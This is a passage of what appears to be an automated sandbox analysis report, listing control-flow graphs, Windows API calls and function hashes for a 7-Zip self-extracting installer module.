                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004072C3
                                                                                                                                          • Part of subcall function 00409606: wvsprintfW.USER32(?,00000000,?), ref: 0040962A
                                                                                                                                          • Part of subcall function 00409606: GetLastError.KERNEL32 ref: 0040963B
                                                                                                                                          • Part of subcall function 00409606: FormatMessageW.KERNEL32(00001100,00000000,00000000,?,?,00000000,004072DC), ref: 00409663
                                                                                                                                          • Part of subcall function 00409606: FormatMessageW.KERNEL32(00001100,00000000,?,00000000,?,00000000,004072DC), ref: 00409678
                                                                                                                                          • Part of subcall function 00409606: lstrlenW.KERNEL32(?), ref: 0040968B
                                                                                                                                          • Part of subcall function 00409606: lstrlenW.KERNEL32(?), ref: 00409692
                                                                                                                                          • Part of subcall function 00409606: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004096A7
                                                                                                                                          • Part of subcall function 00409606: lstrcpyW.KERNEL32(00000000,?), ref: 004096BD
                                                                                                                                          • Part of subcall function 00409606: lstrcpyW.KERNEL32(-00000002,?), ref: 004096CE
                                                                                                                                          • Part of subcall function 00409606: ??3@YAXPAX@Z.MSVCRT(00000000,00000000), ref: 004096D7
                                                                                                                                          • Part of subcall function 00409606: LocalFree.KERNEL32(?), ref: 004096E1
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,00000001,00000010,?), ref: 004072E4
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000001,00000010,?), ref: 004072EC
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000001,00000010,?), ref: 004072F4
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000001,00000010,?), ref: 004072FA
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000001,00000010,?), ref: 00407302
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000001,00000010,?), ref: 0040730A
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000001,00000010,?), ref: 00407312
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,?), ref: 00407331
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 00407339
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 00407341
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?), ref: 00407347
                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000000,?,?), ref: 00407380
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 004073AA
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 0040746E
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 00407476
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 0040748D
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 004074A1
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 004074A9
                                                                                                                                        • MessageBoxA.USER32(00000000,Sorry, this program requires Microsoft Windows 2000 or later.,7-Zip SFX,00000010), ref: 004074C2
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ??3@$Message_wtol$lstrlen$??2@wsprintf$CommandCurrentFileFormatLineModuleProcessTimerlstrcpy$?_set_new_handler@@AttributesCallbackCreateDirectoryDispatchDispatcherErrorFolderFreeHandleInitializeKillLastLocalNamePathSizeSpecialStateUserVersionWindowWorkingwvsprintf
                                                                                                                                        • String ID: " -$$A$0A$0A$0A$123456789ABCDEFGHJKMNPQRSTUVWXYZ$7-Zip SFX$7ZipSfx.%03x$7zSfxString%d$7zSfxVarCmdLine0$7zSfxVarCmdLine1$7zSfxVarCmdLine2$7zSfxVarModulePlatform$7zSfxVarSystemLanguage$7zSfxVarSystemPlatform$AutoInstall$BeginPrompt$BeginPromptTimeout$Delete$ExecuteFile$ExecuteParameters$FinishMessage$GUIFlags$GUIMode$HelpText$InstallPath$MiscFlags$OverwriteMode$RunProgram$SelfDelete$SetEnvironment$SfxAuthor$Shortcut$Sorry, this program requires Microsoft Windows 2000 or later.$amd64$bpt$del$forcenowait$hidcon$i386$nowait$pA$setup.exe$sfxconfig$sfxelevation$sfxlang$sfxversion$sfxwaitall$shc$waitall$x64$x86$A$A$A
                                                                                                                                        • API String ID: 1301190434-1447873201
                                                                                                                                        • Opcode ID: 80ae3e338bd2c6bf34f732366e6f21bef20734440bf6bcc7836777fffa1ed4bd
                                                                                                                                        • Instruction ID: 37b3d77bb6f8fb102f6eda89de8ddb12e9592f0eac1975534991a7b966549d26
                                                                                                                                        • Opcode Fuzzy Hash: 80ae3e338bd2c6bf34f732366e6f21bef20734440bf6bcc7836777fffa1ed4bd
                                                                                                                                        • Instruction Fuzzy Hash: 69E2E271904208AADF25AF62DC46AEE3768EF04304F54403BFD06B61D2EB7D9991CB5E

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 1094 4039e7-403a0d lstrlenW call 402a67 1097 403a18-403a24 1094->1097 1098 403a0f-403a13 call 4011b7 1094->1098 1100 403a26-403a2a 1097->1100 1101 403a2c-403a32 1097->1101 1098->1097 1100->1101 1102 403a35-403a37 1100->1102 1101->1102 1103 403a5b-403a64 call 401e6b 1102->1103 1106 403a66-403a79 GetSystemTimeAsFileTime GetFileAttributesW 1103->1106 1107 403a4a-403a4c 1103->1107 1108 403a92-403a9b call 401e6b 1106->1108 1109 403a7b-403a89 call 40367d 1106->1109 1110 403a39-403a41 1107->1110 1111 403a4e-403a50 1107->1111 1124 403aac-403aae 1108->1124 1125 403a9d-403aaa call 409606 1108->1125 1109->1108 1123 403a8b-403a8d 1109->1123 1110->1111 1116 403a43-403a47 1110->1116 1112 403a56 1111->1112 1113 403b0a-403b10 1111->1113 1112->1103 1119 403b12-403b1d 1113->1119 1120 403b3a-403b4d call 409606 ??3@YAXPAX@Z 1113->1120 1116->1111 1121 403a49 1116->1121 1119->1120 1126 403b1f-403b23 1119->1126 1135 403b4f-403b53 1120->1135 1121->1107 1130 403b2f-403b38 ??3@YAXPAX@Z 1123->1130 1127 403ab0-403acf memcpy 1124->1127 1128 403afe-403b08 ??3@YAXPAX@Z 1124->1128 1125->1123 1126->1120 1132 403b25-403b2a 1126->1132 1133 403ad1 1127->1133 1134 403ae4-403ae8 1127->1134 1128->1135 1130->1135 1132->1120 1137 403b2c-403b2e 1132->1137 1138 403ae3 1133->1138 1139 403ad3-403adb 1134->1139 1140 403aea-403af7 call 401e6b 1134->1140 1137->1130 1138->1134 1139->1140 1141 403add-403ae1 1139->1141 1140->1125 1144 403af9-403afc 1140->1144 1141->1138 1141->1140 1144->1127 1144->1128
                                                                                                                                        APIs
                                                                                                                                        • lstrlenW.KERNEL32(00401A74,00000000,?,?,?,?,?,?,00401A74,?), ref: 004039F4
                                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(?,00401A74,?,?,?,?,00401A74,?), ref: 00403A6A
                                                                                                                                        • GetFileAttributesW.KERNELBASE(?,?,?,?,?,00401A74,?), ref: 00403A71
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,00401A74,?,?,?,?,00401A74,?), ref: 00403B30
                                                                                                                                          • Part of subcall function 004011B7: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,004014FF,00000003,?,00405C8B,?,00000000), ref: 004011D7
                                                                                                                                          • Part of subcall function 004011B7: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,004014FF,00000003,?,00405C8B,?,00000000), ref: 004011FD
                                                                                                                                        • memcpy.MSVCRT(-00000001,00401A74,?,?,?,?,?,00401A74,?), ref: 00403AC2
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00401A74,?), ref: 00403AFF
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(?,00000001,0000000C,00401A74,00401A74,?,?,?,?,00401A74,?), ref: 00403B45
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ??3@$FileTime$??2@AttributesSystemlstrlenmemcpy
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 846840743-0
                                                                                                                                        • Opcode ID: 61fbb82b866355ca103b6651924008aad8ffda89ca2a341e34f636fd10af957e
                                                                                                                                        • Instruction ID: 952cd346550c55d7e35c26256f51fad4d5ed31c9206aabe41908170679320093
                                                                                                                                        • Opcode Fuzzy Hash: 61fbb82b866355ca103b6651924008aad8ffda89ca2a341e34f636fd10af957e
                                                                                                                                        • Instruction Fuzzy Hash: 4141E836A00112AADB20AF59C841ABF7B7CEB4170AF50413BEC81B21D1D77D5A4286DD

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 1174 402665-402684 LoadLibraryA GetProcAddress 1175 402692-402695 1174->1175 1176 402686-402691 GetNativeSystemInfo 1174->1176
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(kernel32,GetNativeSystemInfo,?,?,?,?,?,0040269B,00405D06,7zSfxVarModulePlatform,x86), ref: 00402675
                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0040267C
                                                                                                                                        • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,0040269B,00405D06,7zSfxVarModulePlatform,x86), ref: 0040268A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressInfoLibraryLoadNativeProcSystem
                                                                                                                                        • String ID: GetNativeSystemInfo$kernel32
                                                                                                                                        • API String ID: 2103483237-3846845290
                                                                                                                                        • Opcode ID: 19664b54b855b72bcbaa716dd824881a6f451c3f2b4ed8b8d333fe071d6dfa80
                                                                                                                                        • Instruction ID: 08739c12cb3b948957cf2c0406c7fd7347f4194bf9f07d28511d247575205d7a
                                                                                                                                        • Opcode Fuzzy Hash: 19664b54b855b72bcbaa716dd824881a6f451c3f2b4ed8b8d333fe071d6dfa80
                                                                                                                                        • Instruction Fuzzy Hash: AAD05EB0A0520576CB00ABB15D0E9EB7AEC5A48608B144461A806F00C5EAADDD90C36A

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 1216 40367d-403694 GetFileAttributesW 1217 403696-403698 1216->1217 1218 40369a-40369c 1216->1218 1219 4036f3-4036f5 1217->1219 1220 4036ab-4036b2 1218->1220 1221 40369e-4036a9 SetLastError 1218->1221 1222 4036b4-4036bb call 403650 1220->1222 1223 4036bd-4036c0 1220->1223 1221->1219 1222->1219 1225 4036f0-4036f2 1223->1225 1226 4036c2-4036d3 FindFirstFileW 1223->1226 1225->1219 1226->1222 1228 4036d5-4036ee FindClose CompareFileTime 1226->1228 1228->1222 1228->1225
                                                                                                                                        APIs
                                                                                                                                        • GetFileAttributesW.KERNELBASE(?,-00000001), ref: 0040368B
                                                                                                                                        • SetLastError.KERNEL32(00000010), ref: 004036A0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AttributesErrorFileLast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1799206407-0
                                                                                                                                        • Opcode ID: d36faaefddfd81e2762f97a3370e571bf9c3961ee8d128041245bb49f3de1fe9
                                                                                                                                        • Instruction ID: 2afa7e6ed9b3c4e8b0be6899d5053f20146e769dcf51bfeaf0e83b5e475a48be
                                                                                                                                        • Opcode Fuzzy Hash: d36faaefddfd81e2762f97a3370e571bf9c3961ee8d128041245bb49f3de1fe9
                                                                                                                                        • Instruction Fuzzy Hash: 7001AD30402014BEDB206F759C099EA3B5CAF0132AF204E32F822F23D0D739CB469A5E
                                                                                                                                        APIs
                                                                                                                                        • GetDiskFreeSpaceExW.KERNELBASE(?,00000000,00000000), ref: 00401246
                                                                                                                                        • SendMessageW.USER32(00008001,00000000,?), ref: 0040129F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DiskFreeMessageSendSpace
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 696007252-0
                                                                                                                                        • Opcode ID: af37885296c4e33022f6aa73873594c733a529e1bca2c9c6b159ebc59711ebec
                                                                                                                                        • Instruction ID: 952f35bfd535ad09d3a1e6728af904cc40037fdc81ed9fa17bdc1f07510a46f8
                                                                                                                                        • Opcode Fuzzy Hash: af37885296c4e33022f6aa73873594c733a529e1bca2c9c6b159ebc59711ebec
                                                                                                                                        • Instruction Fuzzy Hash: 3F016DB4611208ABEB94DB52DC45F9A77A9AB01714F10807EFD00FA1F0C7B9A9808B1D

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 793 401b0b-401b1b 794 401b27-401b52 call 413cbd 793->794 795 401b1d-401b22 793->795 800 401b54 794->800 801 401b65-401b71 call 4014eb 794->801 796 401e65-401e68 795->796 802 401b56-401b60 call 412574 800->802 807 401e47-401e62 ??3@YAXPAX@Z call 412574 801->807 808 401b77-401b7c 801->808 809 401e64 802->809 807->809 808->807 810 401b82-401bb8 call 401403 call 4017c0 call 40143c ??3@YAXPAX@Z 808->810 809->796 820 401e2d-401e30 810->820 821 401bbe-401bdd 810->821 822 401e32-401e45 ??3@YAXPAX@Z call 412574 820->822 825 401bf8-401bfc 821->825 826 401bdf-401bf3 call 412574 ??3@YAXPAX@Z 821->826 822->809 829 401c03-401c08 825->829 830 401bfe-401c01 825->830 826->802 833 401c2a-401c2d 829->833 834 401c0a 829->834 832 401c30-401c47 830->832 832->826 838 401c49-401c6c 832->838 833->832 835 401c0c-401c12 834->835 839 401c14-401c25 call 412574 ??3@YAXPAX@Z 835->839 843 401c87-401c8d 838->843 844 401c6e-401c82 call 412574 ??3@YAXPAX@Z 838->844 839->802 846 401ca9-401cbb GetLocalTime SystemTimeToFileTime 843->846 847 401c8f-401c92 843->847 844->802 850 401cc1-401cc4 846->850 848 401c94-401c96 847->848 849 401c9b-401ca7 847->849 848->835 849->850 852 401cc6-401cd0 call 4039e7 850->852 853 401cdd-401ce4 call 40367d 850->853 852->839 858 401cd6-401cd8 852->858 857 401ce9-401cee 853->857 859 401cf4-401cf7 857->859 860 401e19-401e28 GetLastError 857->860 858->835 861 401cfd-401d07 ??2@YAPAXI@Z 859->861 862 401e0f-401e12 859->862 860->820 864 401d18 861->864 865 401d09-401d16 861->865 862->860 866 401d1a-401d3e call 41334e call 412468 864->866 865->866 871 401df4-401e0d call 4136b9 call 412574 866->871 872 401d44-401d62 GetLastError call 4013d1 call 4033bd 866->872 871->822 881 401d64-401d6b 872->881 882 401d9f-401db4 call 4039e7 872->882 885 401d6f-401d7f ??3@YAXPAX@Z 881->885 886 401dc0-401dd8 call 412468 882->886 887 401db6-401dbe 882->887 888 401d81-401d83 885->888 889 401d87-401d9a call 412574 ??3@YAXPAX@Z 885->889 895 401dda-401de9 GetLastError 886->895 896 401deb-401df3 ??3@YAXPAX@Z 886->896 887->885 888->889 889->802 895->885 896->871
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 55ca3ee3d26e98f30d69d3e888b340bde38f36a0fcd7a85b294178b1590f4b85
                                                                                                                                        • Instruction ID: f12f3cbfd9e378c4fb4e9f7b852960855991058b71a72fc1bb9c774fc2295476
                                                                                                                                        • Opcode Fuzzy Hash: 55ca3ee3d26e98f30d69d3e888b340bde38f36a0fcd7a85b294178b1590f4b85
                                                                                                                                        • Instruction Fuzzy Hash: 2CB18071900204EFCF15EFA5C8849EEB7B5FF44304B20852BF812A72A1DB78E945CB59

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00405C1B,?,00000000), ref: 00402023
                                                                                                                                        • CreateWindowExW.USER32(00000000,Static,0041A584,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00402040
                                                                                                                                        • SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00402052
                                                                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0040205F
                                                                                                                                        • DispatchMessageW.USER32(?), ref: 00402069
                                                                                                                                        • KillTimer.USER32(00000000,00000001,?,?,?,?,?,?,00405C1B,?,00000000), ref: 00402072
                                                                                                                                        • KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,00405C1B,?,00000000), ref: 00402079
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageTimer$CallbackCreateDispatchDispatcherHandleKillModuleUserWindow
                                                                                                                                        • String ID: Static
                                                                                                                                        • API String ID: 2479445380-2272013587
                                                                                                                                        • Opcode ID: 947087521f2d8a527adb1e132fdb1a2ab70df0e469f5237fcb2ff151bfac6e68
                                                                                                                                        • Instruction ID: 2d78b022e2fbb31551ae1a24c66cabd830678dfcab2333de03de12e069c17b52
                                                                                                                                        • Opcode Fuzzy Hash: 947087521f2d8a527adb1e132fdb1a2ab70df0e469f5237fcb2ff151bfac6e68
                                                                                                                                        • Instruction Fuzzy Hash: 2BF062325472217BCA312BA69C4DEEF3E2DEF46BB1F004260F619A11D1DAB94111C6BA

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 901 414491-4144ac call 416606 904 4144bb-4144f9 call 407613 call 4136b9 901->904 905 4144ae-4144b8 901->905 910 4145c7-4145ed call 41424b call 414186 904->910 911 4144ff-414509 ??2@YAPAXI@Z 904->911 921 41460b-414623 call 4127e6 call 413cbd 910->921 922 4145ef-414605 call 413d98 910->922 912 414518 911->912 913 41450b-414516 911->913 916 41451a-414553 call 41334e ??2@YAPAXI@Z 912->916 913->916 923 414565 916->923 924 414555-414563 916->924 938 414625-414632 ??2@YAPAXI@Z 921->938 939 41465b-41466b 921->939 922->921 932 414787-41479e 922->932 925 414567-4145a0 call 41334e call 410320 call 414020 923->925 924->925 953 4145a2-4145a4 925->953 954 4145a8-4145ad 925->954 941 414a14-414a2f call 413d2a 932->941 942 4147a4 932->942 943 414634-41463b call 414270 938->943 944 41463d 938->944 955 41469b-4146a1 939->955 956 41466d 939->956 961 414a31-414a37 941->961 962 414a3a-414a3d 941->962 949 4147a7-4147da 942->949 945 41463f-41464f call 4136b9 943->945 944->945 967 414651-414654 945->967 968 414656 945->968 973 414810-414828 949->973 974 4147dc-4147e5 949->974 953->954 964 4145b5-4145c1 954->964 965 4145af-4145b1 954->965 959 414775-414784 call 414419 955->959 960 4146a7-4146c7 call 412958 955->960 963 41466f-414695 call 412885 call 413d75 call 413edc call 413f0e 956->963 959->932 977 4146cc-4146d4 960->977 961->962 962->963 971 414a43-414a6a call 41271d 962->971 963->955 964->910 964->911 965->964 975 414658 967->975 968->975 994 414a82-414a9e 971->994 995 414a6c-414a80 call 416407 971->995 990 4148e2-414925 call 41271d * 2 973->990 991 41482e-414833 973->991 980 4147eb-414800 974->980 981 41497f-414981 974->981 975->939 983 414949-41494e 977->983 984 4146da-4146e1 977->984 998 414ab1-414ab3 980->998 999 414806-414808 980->999 997 414985-41498a 981->997 988 414950-414952 983->988 989 414956-41495b 983->989 992 4146e3-4146e7 984->992 993 41470f-414712 984->993 988->989 1002 414963-414966 989->1002 1003 41495d-41495f 989->1003 1036 414927-41492a 990->1036 1037 41498f 990->1037 1004 414ac3-414ac5 991->1004 1005 414839-41484a 991->1005 992->993 1007 4146e9-4146ec 992->1007 1000 414978-41497d 993->1000 1001 414718-414726 call 4136b9 993->1001 1091 414a9f call 418583 994->1091 1092 414a9f call 413bea 994->1092 1093 414a9f call 402a2f 994->1093 995->994 997->963 1012 414ab5-414ab7 998->1012 1013 414abb-414abe 998->1013 999->973 1017 41480a-41480c 999->1017 1000->981 1000->997 1032 414733-414744 call 414020 1001->1032 1033 414728-41472e call 418e03 1001->1033 1002->963 1003->1002 1022 414ac9-414ace 1004->1022 1034 414850-414882 call 402a67 call 40b2b0 1005->1034 1035 414ad3-414ae1 SysFreeString 1005->1035 1015 4146f2-414700 call 4136b9 1007->1015 1016 41496b-414970 1007->1016 1011 414aa2-414aac call 412885 1011->963 1012->1013 1013->963 1015->1032 1040 414702-41470d call 418dde 1015->1040 1016->997 1026 414972-414974 1016->1026 1017->973 1022->963 1026->1000 1053 414746-414748 1032->1053 1054 41474c-414751 1032->1054 1033->1032 1063 414884-41488a 1034->1063 1064 41489a-4148b8 ??3@YAXPAX@Z 1034->1064 1038 414ae3-414ae5 1035->1038 1039 414ae9-414aeb 1035->1039 1045 41492d-414945 call 416407 1036->1045 1044 414992-414997 1037->1044 1038->1039 1039->963 1040->1032 1049 414999-4149a5 call 413fb1 1044->1049 1050 4149df-414a0b call 412885 * 2 1044->1050 1067 414947 1045->1067 1069 4149b3-4149bf call 413ffc 1049->1069 1070 4149a7-4149b1 1049->1070 1050->949 1087 414a11 1050->1087 1053->1054 1058 414753-414755 1054->1058 1059 414759-41475e 1054->1059 1058->1059 1061 414760-414762 1059->1061 1062 414766-41476f 1059->1062 1061->1062 1062->959 1062->960 1068 41488c-414898 1063->1068 1076 414af0-414af7 ??3@YAXPAX@Z 1064->1076 1077 4148be-4148da ??3@YAXPAX@Z SysFreeString 1064->1077 1067->1044 1068->1064 1068->1068 1082 4149c5 1069->1082 1083 414af9-414b09 call 412885 * 2 1069->1083 1073 4149c8-4149dd call 416407 1070->1073 1073->1049 1073->1050 1076->1035 1077->990 1081 4148dc-4148de 1077->1081 1081->990 1082->1073 1083->1022 1087->941 1091->1011 1092->1011 1093->1011
                                                                                                                                        APIs
                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000018,00000000,?,00000000,?), ref: 00414501
                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT(00000028,00000000,00000000,?,00000000,?), ref: 0041454B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.3289575439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.3289559565.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289596546.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289612556.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.3289629559.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ??2@
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1033339047-0
                                                                                                                                        • Opcode ID: 8c275e2cc856adcccae56b2b03b23110c5135f8455b1c708b9d72e7dbd912df9
                                                                                                                                        • Instruction ID: b54dbc60db56bc1e6d6afd4c66008574e1cbac59b919e387d83e05da41c529ad
                                                                                                                                        • Opcode Fuzzy Hash: 8c275e2cc856adcccae56b2b03b23110c5135f8455b1c708b9d72e7dbd912df9
                                                                                                                                        • Instruction Fuzzy Hash: 89321271900249DFCB14DFA5C8848EEBBB5BF88308B14456EF9169B351CB39E985CF98

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
